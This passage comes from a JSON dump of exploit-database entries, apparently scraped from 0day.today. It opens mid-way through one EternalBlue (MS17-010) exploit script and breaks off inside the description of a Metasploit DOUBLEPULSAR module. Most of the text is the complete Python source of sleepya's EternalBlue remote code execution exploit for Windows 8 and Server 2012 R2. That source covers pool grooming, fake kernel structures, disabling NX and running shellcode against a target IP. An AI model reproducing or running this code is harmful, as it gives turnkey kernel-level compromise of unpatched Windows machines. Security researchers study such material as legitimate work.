allocation is not allocated next to holeConn because of this free buffer\r\n allocConn.get_socket().close()\r\n \r\n # hope one of srvnetConn is next to holeConn\r\n for i in range(5):\r\n sk = createConnectionWithBigSMBFirst80(target)\r\n srvnetConn.append(sk)\r\n \r\n # send echo again, all new 5 srvnet buffers should be created\r\n #sendEcho(conn, tid, 'a'*12)\r\n \r\n # remove holeConn to create hole for fea buffer\r\n holeConn.get_socket().close()\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n send_trans2_second(conn, tid, feaList[progress:], progress)\r\n recvPkt = conn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n # retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag\r\n if retStatus == 0xc000000d:\r\n print('good response status: INVALID_PARAMETER')\r\n else:\r\n print('bad response status: 0x{:08x}'.format(retStatus))\r\n \r\n \r\n # one of srvnetConn struct header should be modified\r\n # a corrupted buffer will write recv data in designed memory address\r\n for sk in srvnetConn:\r\n sk.send(fake_recv_struct + shellcode)\r\n \r\n # execute shellcode by closing srvnet connection\r\n for sk in srvnetConn:\r\n sk.close()\r\n \r\n # nicely close connection (no need for exploit)\r\n conn.disconnect_tree(tid)\r\n conn.logoff()\r\n conn.get_socket().close()\r\n \r\n \r\nif len(sys.argv) < 3:\r\n print(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0]))\r\n sys.exit(1)\r\n \r\nTARGET=sys.argv[1]\r\nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])\r\n \r\nfp = open(sys.argv[2], 'rb')\r\nsc = fp.read()\r\nfp.close()\r\n \r\nprint('shellcode size: {:d}'.format(len(sc)))\r\nprint('numGroomConn: {:d}'.format(numGroomConn))\r\n \r\nexploit(TARGET, sc, numGroomConn)\r\nprint('done')\n\n# 0day.today [2018-02-06] #", "sourceHref": "https://0day.today/exploit/27802", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T23:01:39", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "zdt", "title": "Microsoft Windows 8 / 2012 R2 (x64) - EternalBlue SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-19T00:00:00", "id": "1337DAY-ID-27803", "href": "https://0day.today/exploit/description/27803", "sourceData": "#!/usr/bin/python\r\nfrom impacket import smb\r\nfrom struct import pack\r\nimport os\r\nimport sys\r\nimport socket\r\n \r\n'''\r\nEternalBlue exploit for Windows 8 and 2012 by sleepya\r\nThe exploit might FAIL and CRASH a target system (depended on what is overwritten)\r\nThe exploit support only x64 target\r\nTested on:\r\n- Windows 2012 R2 x64\r\n- Windows 8.1 x64\r\nDefault Windows 8 and later installation without additional service info:\r\n- anonymous is not allowed to access any share (including IPC$)\r\n- tcp port 445 if filtered by firewall\r\nReference:\r\n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\r\nExploit info:\r\n- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\r\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\r\n- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\r\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. 
Need to disable it before controlling RIP.\r\n- The exploit is likely to crash a target when it failed\r\n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\r\n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)\r\n- See the code and comment for exploit detail.\r\nDisable NX method:\r\n- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\r\n- The exploit is also the same but we need to trigger bug twice\r\n- First trigger, set MDL.MappedSystemVa to target pte address\r\n - Write '\\x00' to disable the NX flag\r\n- Second trigger, do the same as Windows 7 exploit\r\n- From my test, if exploit disable NX successfully, I always get code execution\r\n'''\r\n \r\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\r\nNTFEA_SIZE = 0x9000\r\n \r\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\r\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\r\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\r\n \r\n'''\r\nReverse from srvnet.sys (Win2012 R2 x64)\r\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\r\n// size 0x90\r\nstruct SRVNET_BUFFER_HDR {\r\n LIST_ENTRY list;\r\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. 
if 0x2 is set, go to lookaside.\r\n char unknown0[6];\r\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\r\n DWORD netRawBufferSize; // offset: 0x20\r\n DWORD ioStatusInfo;\r\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\r\n DWORD pad2;\r\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\r\n PMDL pmdl1; // point at offset 0x90 from this struct\r\n DWORD nByteProcessed; // 0x40\r\n char unknown4[4];\r\n QWORD smbMsgSize; // MUST be modified to size of all recv data\r\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\r\n QWORD pSrvNetWskStruct; // want to change to fake struct address\r\n DWORD unknown6; // 0x60\r\n char unknown7[12];\r\n char unknown8[0x20];\r\n};\r\nstruct SRVNET_BUFFER {\r\n char transportHeader[80]; // 0x50\r\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\r\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\r\n //MDL mdl1; // target\r\n};\r\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\r\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and \r\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\r\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\r\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\r\n'''\r\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\r\n# Here is the important fields on x64\r\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. 
This value MUST be valid address because there is\r\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\r\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\r\n# This value MUST be exactly same as the number of bytes we send.\r\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\r\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\r\n# The value MUST point to valid (might be fake) struct.\r\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\r\n# - 0x90 (VOID*) : MDL.Next should be NULL\r\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\r\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\r\n# - 0x90 (VOID*) : MDL.Process should be NULL\r\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\r\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\r\n# \r\n#\r\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\r\n# Here is related field for freeing corrupted buffer\r\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\r\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\r\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\r\n# before calling SrvNetCommonReceiveHandler(). 
This is possible because pointer to SRVNET_BUFFER struct is passed to\r\n# your shellcode as function argument\r\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\r\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\r\n# Here is x64 assembly code for setting nByteProcessed field\r\n# - fetch SRVNET_BUFFER address from function argument\r\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\r\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\r\n# \\x48\\x01\\xd1 add rcx, rdx\r\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\r\n# - set nByteProcessed for trigger free after return\r\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\r\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\r\n \r\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd00e00 # for put fake struct and shellcode\r\n \r\n# Note: feaList will be created after knowing shellcode size.\r\n \r\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\r\n# PTE of 0xffffffffffd01000 is at 0xfffff6ffffffe808\r\n# NX bit is at 0xfffff6ffffffe80f\r\n# MappedSystemVa = 0xfffff6ffffffe80f - 0x7f = 0xfffff6ffffffe790\r\nfakeSrvNetBufferX64Nx = '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0xfffff6ffffffe80f-0x7f) # MDL.Process, MDL.MappedSystemVa\r\n \r\nfeaListNx = pack('<I', 0x10000)\r\nfeaListNx += ntfea9000\r\nfeaListNx += pack('<BBH', 0, 0, 
len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\r\n# stop copying by invalid flag (can be any value except 0 and 0x80)\r\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\r\n \r\n \r\ndef createFakeSrvNetBuffer(sc_size):\r\n # 0x200 is size of fakeSrvNetBufferX64\r\n totalRecvSize = 0x80 + 0x200 + sc_size\r\n fakeSrvNetBufferX64 = '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\r\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\r\n return fakeSrvNetBufferX64\r\n \r\ndef createFeaList(sc_size):\r\n feaList = pack('<I', 0x10000)\r\n feaList += ntfea9000\r\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\r\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\r\n # stop copying by invalid flag (can be any value except 0 and 0x80)\r\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\r\n return feaList\r\n \r\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\r\n# x64: fake struct is at ffffffff ffd00e00\r\n# offset 0x50: KSPIN_LOCK\r\n# offset 0x58: LIST_ENTRY must be valid address. 
cannot be NULL.\r\n# offset 0x110: array of pointer to function\r\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\r\n# some useful offset\r\n# offset 0x120: arg1 when invoking ptr to function\r\n# offset 0x128: arg2 when invoking ptr to function\r\n#\r\n# code path to get code exection after this struct is controlled\r\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\r\nfake_recv_struct = ('\\x00'*16)*5\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\r\nfake_recv_struct += ('\\x00'*16)*10\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x1f0, 0) # offset 0x110: fn_ptr array\r\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\r\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\r\nfake_recv_struct += ('\\x00'*16)*11\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x200) # shellcode address\r\n \r\n \r\ndef getNTStatus(self):\r\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\r\nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\r\n \r\ndef sendEcho(conn, tid, data):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\r\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\r\n transCommand['Data'] = smb.SMBEcho_Data()\r\n \r\n transCommand['Parameters']['EchoCount'] = 1\r\n transCommand['Data']['Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good ECHO response')\r\n else:\r\n print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n \r\n \r\n# do not know why Word Count can be 12\r\n# if word count is not 12, setting ByteCount without enough data will be failed\r\nclass 
SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):\r\n structure = (\r\n ('MaxBuffer','<H'),\r\n ('MaxMpxCount','<H'),\r\n ('VCNumber','<H'),\r\n ('SessionKey','<L'),\r\n #('AnsiPwdLength','<H'),\r\n ('UnicodePwdLength','<H'),\r\n ('_reserved','<L=0'),\r\n ('Capabilities','<L'),\r\n )\r\n \r\ndef createSessionAllocNonPaged(target, size):\r\n # The big nonpaged pool allocation is in BlockingSessionSetupAndX() function\r\n # You can see the allocation logic (even code is not the same) in WinNT4 source code \r\n # https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071\r\n conn = smb.SMB(target, target)\r\n _, flags2 = conn.get_flags()\r\n # FLAGS2_EXTENDED_SECURITY MUST not be set\r\n flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY\r\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\r\n if size >= 0xffff:\r\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\r\n reqSize = size // 2\r\n else:\r\n flags2 |= smb.SMB.FLAGS2_UNICODE\r\n reqSize = size\r\n conn.set_flags(flags2=flags2)\r\n \r\n pkt = smb.NewSMBPacket()\r\n \r\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\r\n sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()\r\n \r\n sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size\r\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\r\n sessionSetup['Parameters']['VCNumber'] = os.getpid()\r\n sessionSetup['Parameters']['SessionKey'] = 0\r\n sessionSetup['Parameters']['AnsiPwdLength'] = 0\r\n sessionSetup['Parameters']['UnicodePwdLength'] = 0\r\n sessionSetup['Parameters']['Capabilities'] = 0x80000000\r\n \r\n # set ByteCount here\r\n sessionSetup['Data'] = pack('<H', size) + '\\x00'*20\r\n pkt.addCommand(sessionSetup)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('SMB1 session setup allocate nonpaged pool success')\r\n else:\r\n 
print('SMB1 session setup allocate nonpaged pool failed')\r\n return conn\r\n \r\n \r\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\r\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\r\nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\r\n structure = (\r\n ('TotalParameterCount','<H=0'),\r\n ('TotalDataCount','<H'),\r\n ('ParameterCount','<H=0'),\r\n ('ParameterOffset','<H=0'),\r\n ('ParameterDisplacement','<H=0'),\r\n ('DataCount','<H'),\r\n ('DataOffset','<H'),\r\n ('DataDisplacement','<H=0'),\r\n ('FID','<H=0'),\r\n )\r\n \r\ndef send_trans2_second(conn, tid, data, displacement):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n # assume no params\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\r\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\r\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\r\n \r\n transCommand['Parameters']['TotalParameterCount'] = 0\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+18\r\n transCommand['Data']['Pad1'] = ''\r\n \r\n transCommand['Parameters']['ParameterCount'] = 0\r\n transCommand['Parameters']['ParameterOffset'] = 0\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - fixedOffset % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = len(data)\r\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\r\n transCommand['Parameters']['DataDisplacement'] = displacement\r\n \r\n transCommand['Data']['Trans_Parameters'] = ''\r\n transCommand['Data']['Trans_Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n \r\n \r\ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n command = pack('<H', setup)\r\n \r\n transCommand = 
smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\r\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\r\n transCommand['Parameters']['MaxSetupCount'] = 1\r\n transCommand['Parameters']['MaxParameterCount'] = len(param)\r\n transCommand['Parameters']['MaxDataCount'] = 0\r\n transCommand['Data'] = smb.SMBTransaction2_Data()\r\n \r\n transCommand['Parameters']['Setup'] = command\r\n transCommand['Parameters']['TotalParameterCount'] = len(param)\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+38 + len(command)\r\n if len(param) > 0:\r\n padLen = (4 - fixedOffset % 4 ) % 4\r\n padBytes = '\\xFF' * padLen\r\n transCommand['Data']['Pad1'] = padBytes\r\n else:\r\n transCommand['Data']['Pad1'] = ''\r\n padLen = 0\r\n \r\n transCommand['Parameters']['ParameterCount'] = len(param)\r\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\r\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\r\n \r\n transCommand['Data']['Trans_Parameters'] = param\r\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB() # must be success\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good NT Trans response')\r\n else:\r\n print('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n sys.exit(1)\r\n \r\n i = firstDataFragmentSize\r\n while i < len(data):\r\n sendSize = min(4096, len(data) - i)\r\n if len(data) - i <= 4096:\r\n if not sendLastChunk:\r\n break\r\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\r\n i += sendSize\r\n \r\n if sendLastChunk:\r\n 
conn.recvSMB()\r\n return i\r\n \r\n \r\n# connect to target and send a large nbss size with data 0x80 bytes\r\n# this method is for allocating big nonpaged pool on target\r\ndef createConnectionWithBigSMBFirst80(target, for_nx=False):\r\n sk = socket.create_connection((target, 445))\r\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\r\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\r\n # Also this is invalid SMB2 message.\r\n # I believe NSA exploit use SMB2 for hiding alert from IDS\r\n #pkt += '\\xffSMB' # smb2\r\n # it can be anything even it is invalid\r\n pkt += 'BAAD' # can be any\r\n if for_nx:\r\n # MUST set no delay because 1 byte MUST be sent immediately\r\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\r\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\r\n else:\r\n pkt += '\\x00'*0x7c\r\n sk.send(pkt)\r\n return sk\r\n \r\n \r\ndef exploit(target, shellcode, numGroomConn):\r\n # force using smb.SMB for SMB1\r\n conn = smb.SMB(target, target)\r\n \r\n # can use conn.login() for ntlmv2\r\n conn.login_standard('', '')\r\n server_os = conn.get_server_os()\r\n print('Target OS: '+server_os)\r\n if not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\r\n print('This exploit does not support this target')\r\n sys.exit()\r\n \r\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n \r\n # Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command\r\n progress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\r\n \r\n # Another NT transaction for disabling NX\r\n nxconn = smb.SMB(target, target)\r\n nxconn.login_standard('', '')\r\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n nxprogress = send_nt_trans(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\r\n \r\n # create some big buffer at server\r\n # this 
buffer MUST NOT be big enough for overflown buffer\r\n allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x2010)\r\n \r\n # groom nonpaged pool\r\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\r\n srvnetConn = []\r\n for i in range(numGroomConn):\r\n sk = createConnectionWithBigSMBFirst80(target, for_nx=True)\r\n srvnetConn.append(sk)\r\n \r\n # create buffer size NTFEA_SIZE at server\r\n # this buffer will be replaced by overflown buffer\r\n holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE-0x10)\r\n # disconnect allocConn to free buffer\r\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\r\n allocConn.get_socket().close()\r\n \r\n # hope one of srvnetConn is next to holeConn\r\n for i in range(5):\r\n sk = createConnectionWithBigSMBFirst80(target, for_nx=True)\r\n srvnetConn.append(sk)\r\n \r\n # remove holeConn to create hole for fea buffer\r\n holeConn.get_socket().close()\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n # first trigger to overwrite srvnet buffer struct for disabling NX\r\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\r\n recvPkt = nxconn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n if retStatus == 0xc000000d:\r\n print('good response status for nx: INVALID_PARAMETER')\r\n else:\r\n print('bad response status for nx: 0x{:08x}'.format(retStatus))\r\n \r\n # one of srvnetConn struct header should be modified\r\n # send '\\x00' to disable nx\r\n for sk in srvnetConn:\r\n sk.send('\\x00')\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n # second trigger to place fake struct and shellcode\r\n send_trans2_second(conn, tid, feaList[progress:], progress)\r\n recvPkt = conn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n if retStatus == 0xc000000d:\r\n print('good response 
status: INVALID_PARAMETER')\r\n else:\r\n print('bad response status: 0x{:08x}'.format(retStatus))\r\n \r\n # one of srvnetConn struct header should be modified\r\n # a corrupted buffer will write recv data in designed memory address\r\n for sk in srvnetConn:\r\n sk.send(fake_recv_struct + shellcode)\r\n \r\n # execute shellcode\r\n for sk in srvnetConn:\r\n sk.close()\r\n \r\n # nicely close connection (no need for exploit)\r\n nxconn.disconnect_tree(tid)\r\n nxconn.logoff()\r\n nxconn.get_socket().close()\r\n conn.disconnect_tree(tid)\r\n conn.logoff()\r\n conn.get_socket().close()\r\n \r\n \r\nif len(sys.argv) < 3:\r\n print(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0]))\r\n sys.exit(1)\r\n \r\nTARGET=sys.argv[1]\r\nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])\r\n \r\nfp = open(sys.argv[2], 'rb')\r\nsc = fp.read()\r\nfp.close()\r\n \r\nif len(sc) > 4096:\r\n print('Shellcode too long. The place that this exploit put a shellcode is limited to 4096 bytes.')\r\n sys.exit()\r\n \r\n# Now, shellcode is known. create a feaList\r\nfeaList = createFeaList(len(sc))\r\n \r\nprint('shellcode size: {:d}'.format(len(sc)))\r\nprint('numGroomConn: {:d}'.format(numGroomConn))\r\n \r\nexploit(TARGET, sc, numGroomConn)\r\nprint('done')\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/27803", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-12-24T11:25:14", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-04T00:00:00", "type": "zdt", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148"], "modified": "2020-02-04T00:00:00", "id": "1337DAY-ID-33895", "href": "https://0day.today/exploit/description/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the 
